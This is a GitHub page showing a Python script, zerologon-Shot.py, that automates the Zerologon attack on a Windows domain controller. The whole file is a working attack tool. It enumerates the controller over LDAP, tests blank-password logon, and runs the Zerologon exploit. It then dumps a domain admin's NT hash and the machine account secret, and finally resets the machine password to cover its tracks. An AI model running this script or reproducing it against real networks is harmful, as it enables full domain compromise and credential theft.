-
Notifications
You must be signed in to change notification settings - Fork 7
/
Copy pathzerologon-Shot.py
82 lines (67 loc) · 3.46 KB
/
zerologon-Shot.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
import sys
import argparse
from binascii import unhexlify
from impacket.ldap import ldap
from impacket.examples.utils import parse_target
from lib.exploit import zerologon
from lib.ldap_ntlmInfo import LDAPInfo
from lib.secretsdump_nano import dump
from lib.restorepassword import ChangeMachinePassword
class wrapper():
def __init__(self, username=None, target=None, domain=None, kdcHost=None, ldaps=False):
self.dcName = username
self.domain = domain
self.dc_ip = target
self.kdcHost = kdcHost
self.ldaps = ldaps
self.baseDN = ""
def pwn(self):
if not (self.dcName or self.domain):
ldapinfo = LDAPInfo(self.dc_ip, self.ldaps)
result = ldapinfo.ldapinfo()
if result:
self.dcName = f'{result["hostname"]}$'
self.domain = result["domain"]
print(f"[*] LDAP enumerate result: hostname: {self.dcName}, domain: {self.domain}")
else:
print("[-] Failed to get target ntlm info with ldap service, please provide it manually.")
return
# Create baseDN
for i in self.domain.split("."):
self.baseDN += f"dc={i},"
# Remove last ","
self.baseDN = self.baseDN[:-1]
# Check if target has been attack before, if can auth with none password, then skip zerologon exploit
try:
print(f"[*] Try to auth ldap use user: {self.dcName} with none password (if target has been pwned before)")
ldapConnection = ldap.LDAPConnection(f'{"ldap" if not self.ldaps else "ldaps"}://{self.domain}', self.baseDN, self.kdcHost)
ldapConnection.login(self.dcName, "", self.domain, "", "")
except ldap.LDAPSessionError as e:
if str(e).find("strongerAuthRequired") >= 0:
print('[-] Target need ldaps, please try with "-ssl"')
sys.exit(0)
else:
# Zerologon exploit
print("[*] Auth failed, start attacking.")
exploit = zerologon(self.dc_ip, self.dcName)
exploit.perform_attack()
else:
print("[+] Successful authentication with none password!")
# Dump first domain admin nthash
secretsdump = dump(dc_ip=self.dc_ip, dcName=self.dcName, domain=self.domain, baseDN=self.baseDN, kdcHost=self.kdcHost, ldaps=self.ldaps)
username, nthash = secretsdump.NTDSDump_BlankPass()
# Get Machine account hexpass
hexpass = secretsdump.LSADump(username, nthash)
# Restore machine account password
action = ChangeMachinePassword(self.dc_ip, self.dcName, unhexlify(hexpass.strip("\r\n")))
action.changePassword()
if __name__ == '__main__':
parser = argparse.ArgumentParser(add_help=True, description="Zerologon with restore DC password automatically.")
parser.add_argument("target", action="store", help="[[domain/]username[:password]@]<targetName or address>")
parser.add_argument("-dc-ip", metavar="ip address", action="store", help="IP Address of the domain controller. If ommited it use the ip part specified in the target parameter")
parser.add_argument("-ssl", action="store_true", help="Enable LDAPS")
options = parser.parse_args()
domain, username, _, address = parse_target(options.target)
kdcHost = options.dc_ip if options.dc_ip else address
executer = wrapper(username, address, domain, kdcHost, options.ssl)
executer.pwn()